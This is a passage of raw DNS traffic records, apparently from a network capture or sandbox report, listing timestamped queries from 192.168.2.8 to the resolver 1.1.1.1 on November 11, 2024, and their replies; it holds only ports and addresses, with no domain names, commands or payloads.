                                                                                                                                                                                                          Nov 11, 2024 18:24:18.313153982 CET5287153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.313231945 CET5875853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.313463926 CET6062753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.313644886 CET5702253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.313663960 CET5026853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.314013004 CET6477953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.315480947 CET6173753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.315726995 CET5378653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.315867901 CET53651361.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.316063881 CET5307753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.316569090 CET53595141.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.316569090 CET5222253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.317336082 CET6052053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.317524910 CET5391853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.317753077 CET5960853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.318161011 CET5063353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.318413019 CET53648771.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.318425894 CET53612411.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.318734884 CET53494011.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.318906069 CET5088253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.319041967 CET53532391.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.319166899 CET53618551.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.319185019 CET53562701.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.320379019 CET53587581.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.323239088 CET53528711.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.323394060 CET53647791.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.323734999 CET53542591.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.326313972 CET53617371.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.326459885 CET53530771.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.327373981 CET53567931.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.329097033 CET53506331.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.329341888 CET53508821.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.330316067 CET5225453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.335228920 CET53522221.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.335279942 CET53539181.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.341520071 CET53522541.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.344830036 CET53502681.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.345108986 CET53570221.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.345715046 CET53606271.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.346055984 CET53537861.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.349088907 CET53605201.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.349487066 CET53596081.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.350622892 CET53563901.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.583249092 CET53618311.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.640330076 CET6346753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.640647888 CET6214853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.643023968 CET5616453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.643239975 CET5489053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.644612074 CET5671053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.645376921 CET5431953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.647378922 CET5204853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.647470951 CET5593153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.647859097 CET5442553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.647936106 CET53621481.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.653251886 CET53548901.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.654906988 CET53544251.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.277858973 CET5122553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.286770105 CET53547661.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.287724972 CET53512251.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.294605970 CET53518211.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.295346975 CET53506771.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.297818899 CET5869653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.298604965 CET4965753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.301402092 CET6282253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.305960894 CET53496571.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.306905031 CET53560741.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.324311972 CET5079453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.324616909 CET4962253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.324670076 CET6545853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.325345039 CET5183853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.325408936 CET5599653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.325953960 CET6021453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.326251984 CET5581853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.326467991 CET5802453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.327253103 CET5467053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.327642918 CET6480253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.327945948 CET5113953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.328151941 CET5678553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.328533888 CET6457253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.328753948 CET6106953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.328917980 CET53586961.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.329123974 CET5916153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.329596996 CET6284253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.329794884 CET6062953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.330245018 CET6015753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.333782911 CET53628221.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.334414959 CET53507941.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.335045099 CET53496221.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.335233927 CET53559961.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.336404085 CET53602141.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.336513996 CET53558181.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.337186098 CET53648021.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.337712049 CET53567851.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.337897062 CET53645721.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.338280916 CET53546701.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.338983059 CET53610691.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.340059042 CET53606291.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.340181112 CET5068853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.340681076 CET53591611.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.341378927 CET4944353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.341474056 CET5834653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.341511011 CET53601571.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.345139980 CET53518381.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.345406055 CET5096253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.347930908 CET5511353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.348114967 CET6034453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.351625919 CET53494431.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.352761984 CET53583461.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.352909088 CET53509621.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.356420040 CET53654581.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.358632088 CET53580241.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.358927965 CET53603441.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.359390974 CET53511391.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.360939026 CET53628421.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.371726036 CET53506881.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.371870995 CET6509853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.371990919 CET6274753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.372078896 CET5610553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.372275114 CET5243753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.372622013 CET5289953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.373157978 CET5096053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.373949051 CET5066953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.377012014 CET5025953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.377702951 CET5473053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.378170013 CET5678253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.378581047 CET6450353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.378602982 CET6144853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.378629923 CET53551131.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.379522085 CET5225353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.379535913 CET6234753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.379750967 CET5594853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.380199909 CET5521753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.380464077 CET6069153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.380717993 CET5908853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.381145954 CET6272653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.381316900 CET5650753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.381337881 CET5063753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.381639004 CET6076553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.381700993 CET6456953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.386256933 CET53614481.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.387258053 CET53606911.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.387602091 CET53547301.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.388488054 CET53567821.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.389695883 CET53552171.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.390748024 CET53607651.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.392290115 CET53506691.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.392417908 CET53559481.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.396579027 CET53623471.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.400588036 CET53565071.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.402661085 CET53627471.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.403783083 CET53561051.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.403812885 CET53650981.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.403824091 CET53528991.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.404325008 CET53524371.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.405612946 CET53509601.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.409742117 CET53502591.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.410254002 CET53645031.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.410929918 CET53522531.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.411632061 CET53590881.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.412162066 CET53627261.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.412560940 CET53506371.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.413553953 CET53645691.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.703891993 CET5265753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.710247993 CET5292553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.713898897 CET53610751.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.713985920 CET53646871.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.719089985 CET5432453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.720876932 CET53529251.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.736402035 CET53526571.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.737982035 CET53543241.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.752144098 CET5025653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.757190943 CET6351453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.765980959 CET6024853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.770410061 CET5459553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.788384914 CET53635141.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.788871050 CET5009153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.789479971 CET4918653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.790707111 CET6350253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.791251898 CET6466953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.792041063 CET5853153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.793951988 CET5545453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.794604063 CET6321353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.796654940 CET5451953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.796747923 CET6108653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.797825098 CET5000253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.798293114 CET53602481.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.798562050 CET53500911.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.798604965 CET6536553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.799335003 CET5338953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.799618006 CET53491861.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.800754070 CET53646691.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.801541090 CET53635021.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.802300930 CET53545951.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.804150105 CET53554541.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.806196928 CET53545191.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.806688070 CET53610861.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.808764935 CET53500021.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.809195995 CET53653651.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.809922934 CET5018253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.810071945 CET53533891.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.811127901 CET5469653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.811333895 CET5045253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.811490059 CET5376553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.812021017 CET5777153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.812736034 CET6440353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.813002110 CET5041353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.813795090 CET4962253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.814321995 CET5375453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.814462900 CET6432353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.814610958 CET5285753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.814791918 CET5250653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.814806938 CET5350753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.819025993 CET5877053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.820125103 CET6021653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.820584059 CET53501821.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.821316004 CET53537651.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.822392941 CET4933153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.822578907 CET53546961.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.823071957 CET53644031.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.823082924 CET53577711.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.823096037 CET53504131.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.823483944 CET53537541.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.823930025 CET53585311.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.825007915 CET53643231.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.825062037 CET53528571.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.826668024 CET53582711.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.827394962 CET53632131.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.829668999 CET53587701.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.830125093 CET53602161.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.831383944 CET5991853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.832068920 CET53493311.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.833256006 CET53525061.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.834184885 CET6029953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.834784985 CET4941653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.842951059 CET53504521.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.845145941 CET53494161.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.845845938 CET53496221.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.846172094 CET53535071.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.857215881 CET6391553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.857613087 CET5036853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.860039949 CET6364253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.860387087 CET5257153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.860625982 CET6174453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.860992908 CET6441253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.860992908 CET5859653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.864125013 CET53599181.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.866640091 CET53602991.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.867420912 CET53639151.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.869013071 CET53503681.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.870426893 CET53585961.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.871998072 CET53644121.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.878289938 CET6187053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.878495932 CET5685953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.878592968 CET53636421.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.878719091 CET6101953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.878894091 CET53617441.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.881380081 CET4917153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.881792068 CET6150253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.882083893 CET5352353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.889595985 CET53610191.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.892457962 CET53535231.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.894125938 CET53525711.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.896699905 CET53491711.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.909364939 CET53618701.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.910341978 CET53568591.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.915875912 CET53615021.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.920027971 CET5906553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.920442104 CET5849553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.811181068 CET53547001.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.811283112 CET53528461.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.827794075 CET53551121.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.281960011 CET6017653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.289123058 CET5191853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.294253111 CET53601761.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.299565077 CET53519181.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.301908016 CET5898853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.312547922 CET53589881.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.317126989 CET5131653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.322336912 CET5185753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.327869892 CET53513161.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.328840017 CET6411853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.340569973 CET53641181.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.341919899 CET4987953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.355411053 CET53518571.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.356048107 CET6118353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.359088898 CET5182153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.366434097 CET53611831.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:23.369879961 CET53518211.1.1.1192.168.2.8
